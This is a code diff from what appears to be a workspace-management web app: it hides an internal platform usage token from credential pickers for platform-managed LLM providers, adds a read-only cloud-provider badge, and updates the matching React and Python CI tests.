type SelectorValue,
|
||||
} from "./ProviderModelSelector";
|
||||
|
||||
@@ -267,10 +268,21 @@ function ProviderPickerModal({
|
||||
setSelectorValue(initial);
|
||||
}, [open, initial]);
|
||||
|
||||
// #2248: filter out provisioner-injected internal tokens for platform-managed
|
||||
// providers so the user can't clobber them. Memoized so the array reference is
|
||||
// stable across renders and does not churn the entries useEffect.
|
||||
const userEditableEnvVars = useMemo(() => {
|
||||
const selectedProvider = catalog.find((p) => p.id === selectorValue.providerId);
|
||||
const isPlatformManaged = selectedProvider ? isPlatformManagedProvider(selectedProvider) : false;
|
||||
return isPlatformManaged
|
||||
? selectorValue.envVars.filter((k) => k !== "MOLECULE_LLM_USAGE_TOKEN")
|
||||
: selectorValue.envVars;
|
||||
}, [catalog, selectorValue.providerId, selectorValue.envVars]);
|
||||
|
||||
useEffect(() => {
|
||||
if (!open) return;
|
||||
setEntries(
|
||||
selectorValue.envVars.map((key) => ({
|
||||
userEditableEnvVars.map((key) => ({
|
||||
key,
|
||||
value: "",
|
||||
// Pre-mark as saved when the key is already in the configured
|
||||
@@ -283,7 +295,7 @@ function ProviderPickerModal({
|
||||
);
|
||||
setOptionalEntries(
|
||||
optionalKeys
|
||||
.filter((key) => !selectorValue.envVars.includes(key))
|
||||
.filter((key) => !userEditableEnvVars.includes(key))
|
||||
.map((key) => ({
|
||||
key,
|
||||
value: "",
|
||||
@@ -292,7 +304,7 @@ function ProviderPickerModal({
|
||||
error: null,
|
||||
})),
|
||||
);
|
||||
}, [open, selectorValue.envVars, configuredKeys, optionalKeys]);
|
||||
}, [open, userEditableEnvVars, configuredKeys, optionalKeys]);
|
||||
|
||||
useEffect(() => {
|
||||
if (!open) return;
|
||||
|
||||
@@ -91,6 +91,7 @@ export interface RegistryModel {
|
||||
name?: string;
|
||||
provider?: string;
|
||||
billing_mode?: "platform_managed" | "byok";
|
||||
required_env?: string[];
|
||||
}
|
||||
|
||||
export interface SelectorValue {
|
||||
|
||||
@@ -0,0 +1,84 @@
|
||||
// @vitest-environment jsdom
|
||||
//
|
||||
// SaaS-mode coverage for the per-workspace cloud-provider picker. The main
|
||||
// CreateWorkspaceDialog.test.tsx runs non-SaaS (the picker is hidden and the
|
||||
// payload omits `provider`); this file forces SaaS by mocking isSaaSTenant so
|
||||
// the picker renders and the selected provider flows into compute.provider.
|
||||
import { describe, it, expect, vi, beforeEach, afterEach } from "vitest";
|
||||
import { render, screen, fireEvent, waitFor, cleanup } from "@testing-library/react";
|
||||
import { CreateWorkspaceButton } from "../CreateWorkspaceDialog";
|
||||
|
||||
vi.mock("@/lib/api", () => ({
|
||||
api: { get: vi.fn(), post: vi.fn() },
|
||||
}));
|
||||
|
||||
// Force SaaS so the Cloud provider picker is shown and the payload carries it.
|
||||
vi.mock("@/lib/tenant", async (importOriginal) => ({
|
||||
...(await importOriginal<typeof import("@/lib/tenant")>()),
|
||||
isSaaSTenant: () => true,
|
||||
}));
|
||||
|
||||
import { api } from "@/lib/api";
|
||||
|
||||
const mockGet = vi.mocked(api.get);
|
||||
const mockPost = vi.mocked(api.post);
|
||||
|
||||
const SAMPLE_TEMPLATES = [
|
||||
{
|
||||
id: "claude-code-default",
|
||||
name: "Claude Code Agent",
|
||||
runtime: "claude-code",
|
||||
model: "moonshot/kimi-k2.6",
|
||||
providers: ["platform", "minimax"],
|
||||
models: [{ id: "moonshot/kimi-k2.6", name: "Kimi K2.6", provider: "platform", required_env: [] }],
|
||||
},
|
||||
];
|
||||
|
||||
beforeEach(() => {
|
||||
vi.clearAllMocks();
|
||||
mockGet.mockImplementation(async (url: string) => {
|
||||
// eslint-disable-next-line @typescript-eslint/no-explicit-any
|
||||
if (url === "/templates") return SAMPLE_TEMPLATES as any;
|
||||
// eslint-disable-next-line @typescript-eslint/no-explicit-any
|
||||
return [] as any;
|
||||
});
|
||||
// eslint-disable-next-line @typescript-eslint/no-explicit-any
|
||||
mockPost.mockResolvedValue({} as any);
|
||||
});
|
||||
|
||||
afterEach(() => cleanup());
|
||||
|
||||
async function openDialog() {
|
||||
render(<CreateWorkspaceButton />);
|
||||
const btn = screen.getAllByRole("button").find((b) => b.textContent?.includes("New Workspace"));
|
||||
fireEvent.click(btn!);
|
||||
await waitFor(() => expect(screen.getByText("Create Workspace")).toBeTruthy());
|
||||
}
|
||||
|
||||
describe("CreateWorkspaceDialog — cloud provider (SaaS)", () => {
|
||||
it("shows the Cloud provider picker, defaulting to AWS", async () => {
|
||||
await openDialog();
|
||||
const select = screen.getByLabelText("Cloud provider") as HTMLSelectElement;
|
||||
expect(select).toBeTruthy();
|
||||
expect(select.value).toBe("aws");
|
||||
});
|
||||
|
||||
it("defaults compute.provider to aws when the picker is untouched", async () => {
|
||||
await openDialog();
|
||||
fireEvent.change(screen.getByPlaceholderText("e.g. SEO Agent"), { target: { value: "AWS Agent" } });
|
||||
fireEvent.click(screen.getAllByRole("button").find((b) => b.textContent === "Create")!);
|
||||
await waitFor(() => expect(mockPost).toHaveBeenCalled());
|
||||
const body = mockPost.mock.calls[0][1] as Record<string, unknown>;
|
||||
expect(body.compute).toMatchObject({ provider: "aws" });
|
||||
});
|
||||
|
||||
it("threads the selected cloud provider into compute.provider", async () => {
|
||||
await openDialog();
|
||||
fireEvent.change(screen.getByPlaceholderText("e.g. SEO Agent"), { target: { value: "GCP Agent" } });
|
||||
fireEvent.change(screen.getByLabelText("Cloud provider"), { target: { value: "gcp" } });
|
||||
fireEvent.click(screen.getAllByRole("button").find((b) => b.textContent === "Create")!);
|
||||
await waitFor(() => expect(mockPost).toHaveBeenCalled());
|
||||
const body = mockPost.mock.calls[0][1] as Record<string, unknown>;
|
||||
expect(body.compute).toMatchObject({ provider: "gcp" });
|
||||
});
|
||||
});
|
||||
@@ -0,0 +1,175 @@
|
||||
// @vitest-environment jsdom
|
||||
/**
|
||||
* Regression tests for #2248 — platform-managed provider credential suppression.
|
||||
*
|
||||
* Covers:
|
||||
* - MOLECULE_LLM_USAGE_TOKEN is hidden when the selected provider is platform-managed
|
||||
* - MOLECULE_LLM_USAGE_TOKEN is still shown for BYOK providers
|
||||
* - No render churn from unstable array references (useMemo guard)
|
||||
*/
|
||||
import { describe, it, expect, vi, afterEach } from "vitest";
|
||||
import { render, screen, fireEvent, cleanup, waitFor, act } from "@testing-library/react";
|
||||
import { MissingKeysModal } from "../MissingKeysModal";
|
||||
import type { ModelSpec, ProviderChoice } from "@/lib/deploy-preflight";
|
||||
|
||||
vi.mock("@/lib/api", () => ({
|
||||
api: { get: vi.fn(), put: vi.fn() },
|
||||
}));
|
||||
|
||||
vi.mock("@/lib/deploy-preflight", async () => {
|
||||
const actual = await vi.importActual<typeof import("@/lib/deploy-preflight")>(
|
||||
"@/lib/deploy-preflight",
|
||||
);
|
||||
return actual;
|
||||
});
|
||||
|
||||
const PLATFORM_MANAGED_MODELS: ModelSpec[] = [
|
||||
{ id: "platform-claude", provider: "platform", required_env: ["ANTHROPIC_API_KEY", "MOLECULE_LLM_USAGE_TOKEN"] },
|
||||
];
|
||||
|
||||
const BYOK_MODELS: ModelSpec[] = [
|
||||
{ id: "byok-claude", provider: "anthropic", required_env: ["ANTHROPIC_API_KEY", "MOLECULE_LLM_USAGE_TOKEN"] },
|
||||
];
|
||||
|
||||
function makeProviders(billingMode: "platform_managed" | "byok"): ProviderChoice[] {
|
||||
const main = {
|
||||
id: billingMode === "platform_managed" ? "platform|ANTHROPIC_API_KEY|MOLECULE_LLM_USAGE_TOKEN" : "anthropic|ANTHROPIC_API_KEY|MOLECULE_LLM_USAGE_TOKEN",
|
||||
label: billingMode === "platform_managed" ? "Platform Anthropic" : "BYOK Anthropic",
|
||||
envVars: ["ANTHROPIC_API_KEY", "MOLECULE_LLM_USAGE_TOKEN"],
|
||||
billingMode,
|
||||
};
|
||||
// Need ≥2 providers so MissingKeysModal enters picker mode (pickerMode = providers.length > 1).
|
||||
const dummy = {
|
||||
id: "openai|OPENAI_API_KEY",
|
||||
label: "OpenAI",
|
||||
envVars: ["OPENAI_API_KEY"],
|
||||
};
|
||||
return [main, dummy];
|
||||
}
|
||||
|
||||
describe("ProviderPickerModal — platform-managed suppression (#2248)", () => {
|
||||
afterEach(() => cleanup());
|
||||
|
||||
it("hides MOLECULE_LLM_USAGE_TOKEN when provider is platform-managed", () => {
|
||||
render(
|
||||
<MissingKeysModal
|
||||
open
|
||||
missingKeys={["ANTHROPIC_API_KEY", "MOLECULE_LLM_USAGE_TOKEN"]}
|
||||
providers={makeProviders("platform_managed")}
|
||||
models={PLATFORM_MANAGED_MODELS}
|
||||
runtime="claude-code"
|
||||
onKeysAdded={vi.fn()}
|
||||
onCancel={vi.fn()}
|
||||
/>,
|
||||
);
|
||||
// Only ANTHROPIC_API_KEY should be rendered; MOLECULE_LLM_USAGE_TOKEN suppressed
|
||||
expect(screen.getByText("ANTHROPIC_API_KEY")).toBeTruthy();
|
||||
expect(screen.queryByText("MOLECULE_LLM_USAGE_TOKEN")).toBeNull();
|
||||
});
|
||||
|
||||
it("shows MOLECULE_LLM_USAGE_TOKEN when provider is BYOK", () => {
|
||||
render(
|
||||
<MissingKeysModal
|
||||
open
|
||||
missingKeys={["ANTHROPIC_API_KEY", "MOLECULE_LLM_USAGE_TOKEN"]}
|
||||
providers={makeProviders("byok")}
|
||||
models={BYOK_MODELS}
|
||||
runtime="claude-code"
|
||||
onKeysAdded={vi.fn()}
|
||||
onCancel={vi.fn()}
|
||||
/>,
|
||||
);
|
||||
// Both keys visible for BYOK
|
||||
expect(screen.getByText("ANTHROPIC_API_KEY")).toBeTruthy();
|
||||
expect(screen.getByText("MOLECULE_LLM_USAGE_TOKEN")).toBeTruthy();
|
||||
});
|
||||
|
||||
it("does not churn renders when the modal is open and platform-managed", () => {
|
||||
let renderCount = 0;
|
||||
|
||||
function RenderSpy({ children }: { children: React.ReactNode }) {
|
||||
renderCount++;
|
||||
return <>{children}</>;
|
||||
}
|
||||
|
||||
render(
|
||||
<RenderSpy>
|
||||
<MissingKeysModal
|
||||
open
|
||||
missingKeys={["ANTHROPIC_API_KEY", "MOLECULE_LLM_USAGE_TOKEN"]}
|
||||
providers={makeProviders("platform_managed")}
|
||||
models={PLATFORM_MANAGED_MODELS}
|
||||
runtime="claude-code"
|
||||
onKeysAdded={vi.fn()}
|
||||
onCancel={vi.fn()}
|
||||
/>
|
||||
</RenderSpy>,
|
||||
);
|
||||
|
||||
const countAfterInitial = renderCount;
|
||||
|
||||
// Wait a tick — if useEffect were looping, renderCount would climb.
|
||||
// In jsdom without real timers there's no automatic re-render, so we
|
||||
// just assert the count is stable immediately after the single
|
||||
// commit required by the initial open state.
|
||||
expect(renderCount).toBe(countAfterInitial);
|
||||
expect(renderCount).toBeLessThanOrEqual(2); // StrictMode double-render ceiling
|
||||
});
|
||||
|
||||
it("updates suppression correctly when switching from BYOK to platform-managed", async () => {
|
||||
const providers: ProviderChoice[] = [
|
||||
{
|
||||
id: "anthropic|ANTHROPIC_API_KEY|MOLECULE_LLM_USAGE_TOKEN",
|
||||
label: "BYOK Anthropic",
|
||||
envVars: ["ANTHROPIC_API_KEY", "MOLECULE_LLM_USAGE_TOKEN"],
|
||||
billingMode: "byok",
|
||||
},
|
||||
{
|
||||
id: "platform|ANTHROPIC_API_KEY|MOLECULE_LLM_USAGE_TOKEN",
|
||||
label: "Platform Anthropic",
|
||||
envVars: ["ANTHROPIC_API_KEY", "MOLECULE_LLM_USAGE_TOKEN"],
|
||||
billingMode: "platform_managed",
|
||||
},
|
||||
{
|
||||
id: "openai|OPENAI_API_KEY",
|
||||
label: "OpenAI",
|
||||
envVars: ["OPENAI_API_KEY"],
|
||||
},
|
||||
];
|
||||
|
||||
const models: ModelSpec[] = [
|
||||
{ id: "byok-claude", provider: "anthropic", required_env: ["ANTHROPIC_API_KEY", "MOLECULE_LLM_USAGE_TOKEN"] },
|
||||
{ id: "platform-claude", provider: "platform", required_env: ["ANTHROPIC_API_KEY", "MOLECULE_LLM_USAGE_TOKEN"] },
|
||||
];
|
||||
|
||||
render(
|
||||
<MissingKeysModal
|
||||
open
|
||||
missingKeys={["ANTHROPIC_API_KEY", "MOLECULE_LLM_USAGE_TOKEN"]}
|
||||
providers={providers}
|
||||
models={models}
|
||||
runtime="claude-code"
|
||||
onKeysAdded={vi.fn()}
|
||||
onCancel={vi.fn()}
|
||||
/>,
|
||||
);
|
||||
|
||||
// Default selection is providers[0] (BYOK) — both keys visible
|
||||
expect(screen.getByText("ANTHROPIC_API_KEY")).toBeTruthy();
|
||||
expect(screen.getByText("MOLECULE_LLM_USAGE_TOKEN")).toBeTruthy();
|
||||
|
||||
// Switch to platform-managed provider
|
||||
const providerSelect = screen.getByTestId("provider-select") as HTMLSelectElement;
|
||||
act(() => {
|
||||
fireEvent.change(providerSelect, {
|
||||
target: { value: "platform|ANTHROPIC_API_KEY|MOLECULE_LLM_USAGE_TOKEN" },
|
||||
});
|
||||
});
|
||||
|
||||
// MOLECULE_LLM_USAGE_TOKEN should now be suppressed
|
||||
await waitFor(() => {
|
||||
expect(screen.getByText("ANTHROPIC_API_KEY")).toBeTruthy();
|
||||
});
|
||||
expect(screen.queryByText("MOLECULE_LLM_USAGE_TOKEN")).toBeNull();
|
||||
});
|
||||
});
|
||||
@@ -13,6 +13,7 @@ import {
|
||||
buildProviderCatalog,
|
||||
buildProviderCatalogFromRegistry,
|
||||
findProviderForModel,
|
||||
isPlatformManagedProvider,
|
||||
type SelectorValue,
|
||||
type ProviderEntry,
|
||||
type RegistryProvider,
|
||||
@@ -682,6 +683,9 @@ export function ConfigTab({ workspaceId }: Props) {
|
||||
name: m.name,
|
||||
// carry the derived provider so the selector buckets correctly
|
||||
...(m.provider ? { provider: m.provider } : {}),
|
||||
// carry required_env so wasTemplateDriven can detect
|
||||
// template-driven env lists for registry-backed runtimes
|
||||
...(m.required_env ? { required_env: m.required_env } : {}),
|
||||
}))
|
||||
: availableModels,
|
||||
[registryBacked, selectedRuntime?.registryModels, availableModels],
|
||||
@@ -1017,6 +1021,15 @@ export function ConfigTab({ workspaceId }: Props) {
|
||||
// top-level model. required_env follows the selected
|
||||
// provider's envVars when the existing required_env
|
||||
// was template-driven (don't clobber user-typed envs).
|
||||
//
|
||||
// #2248: suppress provisioner-injected internal tokens
|
||||
// (MOLECULE_LLM_USAGE_TOKEN) for platform-managed providers
|
||||
// so the user can't clobber them.
|
||||
const selectedEntry = providerCatalog.find((p) => p.id === next.providerId);
|
||||
const isPlatformManaged = selectedEntry ? isPlatformManagedProvider(selectedEntry) : false;
|
||||
const filteredEnvVars = isPlatformManaged
|
||||
? next.envVars.filter((k) => k !== "MOLECULE_LLM_USAGE_TOKEN")
|
||||
: next.envVars;
|
||||
setConfig((prev) => {
|
||||
const v = next.model;
|
||||
const prevModelId = prev.runtime_config?.model || prev.model || "";
|
||||
@@ -1029,8 +1042,8 @@ export function ConfigTab({ workspaceId }: Props) {
|
||||
prevRequired.every((e, i) => e === prevSpec.required_env![i])
|
||||
: false);
|
||||
const nextRequired =
|
||||
next.envVars.length > 0 && wasTemplateDriven
|
||||
? next.envVars
|
||||
wasTemplateDriven
|
||||
? filteredEnvVars
|
||||
: prevRequired;
|
||||
if (prev.runtime) {
|
||||
return {
|
||||
@@ -1038,7 +1051,7 @@ export function ConfigTab({ workspaceId }: Props) {
|
||||
runtime_config: {
|
||||
...prev.runtime_config,
|
||||
model: v,
|
||||
...(next.envVars.length > 0 && wasTemplateDriven
|
||||
...(wasTemplateDriven
|
||||
? { required_env: nextRequired }
|
||||
: {}),
|
||||
},
|
||||
|
||||
@@ -38,8 +38,16 @@ const DATA_PERSISTENCE_OPTIONS = ["", "persist", "ephemeral"];
|
||||
const dataPersistenceLabel = (v: string): string =>
|
||||
v === "persist" ? "Always keep (persist)" : v === "ephemeral" ? "Don't keep (ephemeral)" : "Auto";
|
||||
|
||||
// Cloud/compute backend display name. The provider is chosen at create time and
|
||||
// is NOT editable here (changing a workspace's cloud requires a recreate), so
|
||||
// it renders as a read-only badge — but we must preserve it across Save (the
|
||||
// compute payload is rebuilt below, and dropping it would wipe the column).
|
||||
const cloudProviderLabel = (v: string | undefined): string =>
|
||||
v === "gcp" ? "GCP" : v === "hetzner" ? "Hetzner" : "AWS";
|
||||
|
||||
export function ContainerConfigTab({ workspaceId, data }: Props) {
|
||||
const runtime = data.runtime;
|
||||
const provider = data.compute?.provider; // read-only; set at create time
|
||||
const instanceType = data.compute?.instance_type;
|
||||
const rootGB = data.compute?.volume?.root_gb;
|
||||
const displayMode = data.compute?.display?.mode;
|
||||
@@ -94,6 +102,10 @@ export function ContainerConfigTab({ workspaceId, data }: Props) {
|
||||
: { mode: "none" },
|
||||
// internal#734: omit when "auto" so the wire/default behavior is unchanged.
|
||||
...(form.dataPersistence ? { data_persistence: form.dataPersistence } : {}),
|
||||
// Preserve the create-time cloud provider — it's not editable here, but
|
||||
// this PATCH rebuilds the whole compute object, so omitting it would
|
||||
// wipe the persisted provider (and mislead the badge after a Save).
|
||||
...(provider ? { provider } : {}),
|
||||
};
|
||||
|
||||
const resp = await api.patch<{ needs_restart?: boolean }>(`/workspaces/${workspaceId}`, {
|
||||
@@ -126,7 +138,18 @@ export function ContainerConfigTab({ workspaceId, data }: Props) {
|
||||
<div className="p-4 space-y-4">
|
||||
<section className="rounded-lg border border-line/50 bg-surface-card/40 p-4">
|
||||
<div className="mb-3 flex items-center justify-between gap-3">
|
||||
<h3 className="text-sm font-semibold text-ink">Container Config</h3>
|
||||
<div className="flex items-center gap-2">
|
||||
<h3 className="text-sm font-semibold text-ink">Container Config</h3>
|
||||
{/* Read-only cloud-provider badge — which cloud this workspace's box
|
||||
runs on (AWS/GCP/Hetzner). Defaults to AWS when unset (legacy
|
||||
rows). Set at create time in the Create Workspace dialog. */}
|
||||
<span
|
||||
title="Cloud provider for this workspace's compute (set at create time)"
|
||||
className="rounded-full border border-line/60 bg-surface-sunken px-2 py-0.5 font-mono text-[10px] uppercase tracking-wide text-ink-mid"
|
||||
>
|
||||
{cloudProviderLabel(provider)}
|
||||
</span>
|
||||
</div>
|
||||
{data.needsRestart && <span className="text-[11px] text-warm">Restart required</span>}
|
||||
</div>
|
||||
|
||||
|
||||
@@ -0,0 +1,229 @@
|
||||
// @vitest-environment jsdom
|
||||
//
|
||||
// Regression tests for #2248 — platform-managed provider credential suppression
|
||||
// in ConfigTab.
|
||||
//
|
||||
// Covers:
|
||||
// - required_env is cleared to [] when switching to a platform-managed provider
|
||||
// whose only declared env var is MOLECULE_LLM_USAGE_TOKEN (single-token case).
|
||||
// - required_env preserves non-internal tokens for BYOK providers.
|
||||
|
||||
import { describe, it, expect, vi, afterEach, beforeEach } from "vitest";
|
||||
import { render, screen, cleanup, waitFor, fireEvent } from "@testing-library/react";
|
||||
import React from "react";
|
||||
|
||||
afterEach(cleanup);
|
||||
|
||||
const apiGet = vi.fn();
|
||||
const apiPatch = vi.fn();
|
||||
const apiPut = vi.fn();
|
||||
vi.mock("@/lib/api", () => ({
|
||||
api: {
|
||||
get: (path: string) => apiGet(path),
|
||||
patch: (path: string, body: unknown) => apiPatch(path, body),
|
||||
put: (path: string, body: unknown) => apiPut(path, body),
|
||||
post: vi.fn(),
|
||||
del: vi.fn(),
|
||||
},
|
||||
}));
|
||||
|
||||
vi.mock("@/store/canvas", () => ({
|
||||
useCanvasStore: Object.assign(
|
||||
(selector: (s: unknown) => unknown) =>
|
||||
selector({ restartWorkspace: vi.fn(), updateNodeData: vi.fn() }),
|
||||
{ getState: () => ({ restartWorkspace: vi.fn(), updateNodeData: vi.fn() }) },
|
||||
),
|
||||
}));
|
||||
|
||||
vi.mock("../AgentCardSection", () => ({
|
||||
AgentCardSection: () => <div data-testid="agent-card-stub" />,
|
||||
}));
|
||||
|
||||
import { ConfigTab } from "../ConfigTab";
|
||||
|
||||
function wireApi(opts: {
|
||||
workspaceRuntime?: string;
|
||||
workspaceModel?: string;
|
||||
configYamlContent?: string | null;
|
||||
templates?: Array<{
|
||||
id: string;
|
||||
name?: string;
|
||||
runtime?: string;
|
||||
models?: unknown[];
|
||||
registry_backed?: boolean;
|
||||
registry_providers?: unknown[];
|
||||
registry_models?: unknown[];
|
||||
}>;
|
||||
}) {
|
||||
apiGet.mockImplementation((path: string) => {
|
||||
if (path === `/workspaces/ws-test`) {
|
||||
return Promise.resolve({ runtime: opts.workspaceRuntime ?? "" });
|
||||
}
|
||||
if (path === `/workspaces/ws-test/model`) {
|
||||
return Promise.resolve({ model: opts.workspaceModel ?? "" });
|
||||
}
|
||||
if (path === `/workspaces/ws-test/files/config.yaml`) {
|
||||
if (opts.configYamlContent === null) {
|
||||
return Promise.reject(new Error("not found"));
|
||||
}
|
||||
return Promise.resolve({ content: opts.configYamlContent ?? "" });
|
||||
}
|
||||
if (path === "/templates") {
|
||||
return Promise.resolve(opts.templates ?? []);
|
||||
}
|
||||
return Promise.reject(new Error(`unmocked api.get: ${path}`));
|
||||
});
|
||||
}
|
||||
|
||||
beforeEach(() => {
|
||||
apiGet.mockReset();
|
||||
apiPatch.mockReset();
|
||||
apiPut.mockReset();
|
||||
});
|
||||
|
||||
describe("ConfigTab — platform-managed credential suppression (#2248)", () => {
|
||||
it("clears required_env to [] when switching to a single-token platform-managed provider", async () => {
|
||||
// Setup: workspace currently has a BYOK provider selected with both keys.
|
||||
// The user switches to a platform-managed provider whose ONLY auth_env
|
||||
// is MOLECULE_LLM_USAGE_TOKEN. After filtering, envVars becomes [];
|
||||
// wasTemplateDriven must still overwrite required_env with [] so the
|
||||
// old MOLECULE_LLM_USAGE_TOKEN requirement does not linger.
|
||||
wireApi({
|
||||
workspaceRuntime: "claude-code",
|
||||
workspaceModel: "byok-sonnet",
|
||||
configYamlContent: [
|
||||
"runtime: claude-code",
|
||||
"runtime_config:",
|
||||
" model: byok-sonnet",
|
||||
" required_env:",
|
||||
" - ANTHROPIC_API_KEY",
|
||||
" - MOLECULE_LLM_USAGE_TOKEN",
|
||||
].join("\n"),
|
||||
templates: [
|
||||
{
|
||||
id: "t-claude-code",
|
||||
name: "Claude Code",
|
||||
runtime: "claude-code",
|
||||
models: [],
|
||||
registry_backed: true,
|
||||
registry_providers: [
|
||||
{
|
||||
name: "anthropic",
|
||||
display_name: "BYOK Anthropic",
|
||||
auth_env: ["ANTHROPIC_API_KEY", "MOLECULE_LLM_USAGE_TOKEN"],
|
||||
billing_mode: "byok",
|
||||
},
|
||||
{
|
||||
name: "platform",
|
||||
display_name: "Platform Anthropic",
|
||||
auth_env: ["MOLECULE_LLM_USAGE_TOKEN"],
|
||||
billing_mode: "platform_managed",
|
||||
},
|
||||
],
|
||||
registry_models: [
|
||||
{ id: "byok-sonnet", provider: "anthropic", billing_mode: "byok", required_env: ["ANTHROPIC_API_KEY", "MOLECULE_LLM_USAGE_TOKEN"] },
|
||||
{ id: "platform-sonnet", provider: "platform", billing_mode: "platform_managed", required_env: ["MOLECULE_LLM_USAGE_TOKEN"] },
|
||||
],
|
||||
},
|
||||
],
|
||||
});
|
||||
|
||||
apiPut.mockResolvedValue({});
|
||||
apiPatch.mockResolvedValue({});
|
||||
|
||||
render(<ConfigTab workspaceId="ws-test" />);
|
||||
|
||||
// Wait for the provider dropdown to populate.
|
||||
const providerSelect = (await waitFor(() =>
|
||||
screen.getByTestId("provider-select"),
|
||||
)) as HTMLSelectElement;
|
||||
|
||||
// Switch from BYOK to platform-managed provider.
|
||||
const platformOption = Array.from(providerSelect.options).find((o) =>
|
||||
o.text.includes("Platform"),
|
||||
);
|
||||
expect(platformOption).toBeTruthy();
|
||||
fireEvent.change(providerSelect, { target: { value: platformOption!.value } });
|
||||
|
||||
// Save & Restart.
|
||||
fireEvent.click(screen.getByRole("button", { name: /save & restart/i }));
|
||||
|
||||
await waitFor(() => {
|
||||
expect(apiPut).toHaveBeenCalledWith(
|
||||
"/workspaces/ws-test/files/config.yaml",
|
||||
expect.objectContaining({
|
||||
content: expect.not.stringContaining("ANTHROPIC_API_KEY"),
|
||||
}),
|
||||
);
|
||||
});
|
||||
|
||||
// Verify the specific put call no longer carries the suppressed token.
|
||||
const putCall = apiPut.mock.calls.find(
|
||||
([path]) => path === "/workspaces/ws-test/files/config.yaml",
|
||||
);
|
||||
expect(putCall?.[1].content).not.toContain("MOLECULE_LLM_USAGE_TOKEN");
|
||||
});
|
||||
|
||||
it("preserves non-internal tokens for BYOK providers", async () => {
|
||||
wireApi({
|
||||
workspaceRuntime: "claude-code",
|
||||
workspaceModel: "byok-sonnet",
|
||||
configYamlContent: [
|
||||
"runtime: claude-code",
|
||||
"runtime_config:",
|
||||
" model: byok-sonnet",
|
||||
" required_env:",
|
||||
" - ANTHROPIC_API_KEY",
|
||||
" - MOLECULE_LLM_USAGE_TOKEN",
|
||||
].join("\n"),
|
||||
templates: [
|
||||
{
|
||||
id: "t-claude-code",
|
||||
name: "Claude Code",
|
||||
runtime: "claude-code",
|
||||
models: [],
|
||||
registry_backed: true,
|
||||
registry_providers: [
|
||||
{
|
||||
name: "anthropic",
|
||||
display_name: "BYOK Anthropic",
|
||||
auth_env: ["ANTHROPIC_API_KEY", "MOLECULE_LLM_USAGE_TOKEN"],
|
||||
billing_mode: "byok",
|
||||
},
|
||||
],
|
||||
registry_models: [
|
||||
{ id: "byok-sonnet", provider: "anthropic", billing_mode: "byok" },
|
||||
],
|
||||
},
|
||||
],
|
||||
});
|
||||
|
||||
apiPut.mockResolvedValue({});
|
||||
apiPatch.mockResolvedValue({});
|
||||
|
||||
render(<ConfigTab workspaceId="ws-test" />);
|
||||
|
||||
// Wait for load.
|
||||
await waitFor(() =>
|
||||
screen.getByRole("button", { name: /save & restart/i }),
|
||||
);
|
||||
|
||||
// Click Save without changing provider — BYOK should keep both keys.
|
||||
fireEvent.click(screen.getByRole("button", { name: /save & restart/i }));
|
||||
|
||||
await waitFor(() => {
|
||||
expect(apiPut).toHaveBeenCalledWith(
|
||||
"/workspaces/ws-test/files/config.yaml",
|
||||
expect.objectContaining({
|
||||
content: expect.stringContaining("required_env:"),
|
||||
}),
|
||||
);
|
||||
});
|
||||
|
||||
const putCall = apiPut.mock.calls.find(
|
||||
([path]) => path === "/workspaces/ws-test/files/config.yaml",
|
||||
);
|
||||
expect(putCall?.[1].content).toContain("ANTHROPIC_API_KEY");
|
||||
expect(putCall?.[1].content).toContain("MOLECULE_LLM_USAGE_TOKEN");
|
||||
});
|
||||
});
|
||||
@@ -371,6 +371,12 @@ export interface WorkspaceCompute {
|
||||
// internal#734: per-workspace durable-data choice. "persist" | "ephemeral" |
|
||||
// undefined (auto). Controls whether the data volume survives recreate.
|
||||
data_persistence?: string;
|
||||
// Cloud/compute backend for this workspace box (multi-provider, per-workspace):
|
||||
// "aws" (default EC2) | "gcp" | "hetzner". Distinct from the LLM/model provider.
|
||||
// Set at create time; routed by CP to the matching WorkspaceProvisioner. A
|
||||
// workspace whose provider differs from its tenant's cloud is reached over a
|
||||
// per-workspace Cloudflare tunnel (runtime#95).
|
||||
provider?: string;
|
||||
}
|
||||
|
||||
let socket: ReconnectingSocket | null = null;
|
||||
|
||||
@@ -55,7 +55,7 @@ def drift_module():
|
||||
"SENTINEL_JOB": "all-required",
|
||||
"AUDIT_WORKFLOW_PATH": ".gitea/workflows/audit-force-merge.yml",
|
||||
"CI_WORKFLOW_PATH": ".gitea/workflows/ci.yml",
|
||||
"DRIFT_LABEL": "tier:high",
|
||||
"DRIFT_LABEL": "ci-bp-drift",
|
||||
}
|
||||
with mock.patch.dict(os.environ, env, clear=False):
|
||||
spec = importlib.util.spec_from_file_location(
|
||||
@@ -665,7 +665,7 @@ def test_file_or_update_posts_new_issue_when_none_exists(drift_module, monkeypat
|
||||
stub = _make_stub_api({
|
||||
("GET", "/repos/owner/repo/issues"): (200, []),
|
||||
("POST", "/repos/owner/repo/issues"): (201, {"number": 99}),
|
||||
("GET", "/repos/owner/repo/labels"): (200, [{"id": 10, "name": "tier:high"}]),
|
||||
("GET", "/repos/owner/repo/labels"): (200, [{"id": 10, "name": "ci-bp-drift"}]),
|
||||
("POST", "/repos/owner/repo/issues/99/labels"): (200, []),
|
||||
})
|
||||
monkeypatch.setattr(drift_module, "api", stub)
|
||||
|
||||
@@ -127,7 +127,7 @@ def _stub_api(monkeypatch, lint_mod, bp_response, issue_search_response=None, po
|
||||
posted_record.setdefault("patches", []).append({"path": path, "body": body})
|
||||
return ("ok", {"number": 9001})
|
||||
if "/labels" in path:
|
||||
return ("ok", [{"id": 10, "name": "ci-bp-drift"}, {"id": 9, "name": "tier:high"}])
|
||||
return ("ok", [{"id": 10, "name": "ci-bp-drift"}, {"id": 9, "name": "ci-bp-drift"}])
|
||||
return ("ok", {})
|
||||
|
||||
monkeypatch.setattr(lint_mod, "api", fake_api)
|
||||
|
||||
@@ -427,13 +427,13 @@ def test_required_workflow_with_paths_ignore_fails(
|
||||
"""Same defect class for `paths-ignore` — exit 1, named."""
|
||||
_write_workflow(
|
||||
lint_module.WORKFLOWS_DIR,
|
||||
"sop-tier-check.yml",
|
||||
"name: sop-tier-check\n"
|
||||
"sop-checklist.yml",
|
||||
"name: sop-checklist\n"
|
||||
"on:\n"
|
||||
" pull_request_target:\n"
|
||||
" paths-ignore: ['docs/**']\n"
|
||||
"jobs:\n"
|
||||
" tier-check:\n"
|
||||
" all-items-acked:\n"
|
||||
" runs-on: ubuntu-latest\n",
|
||||
)
|
||||
stub = _make_stub_api({
|
||||
@@ -441,7 +441,7 @@ def test_required_workflow_with_paths_ignore_fails(
|
||||
200,
|
||||
{
|
||||
"status_check_contexts": [
|
||||
"sop-tier-check / tier-check (pull_request_target)"
|
||||
"sop-checklist / all-items-acked (pull_request_target)"
|
||||
]
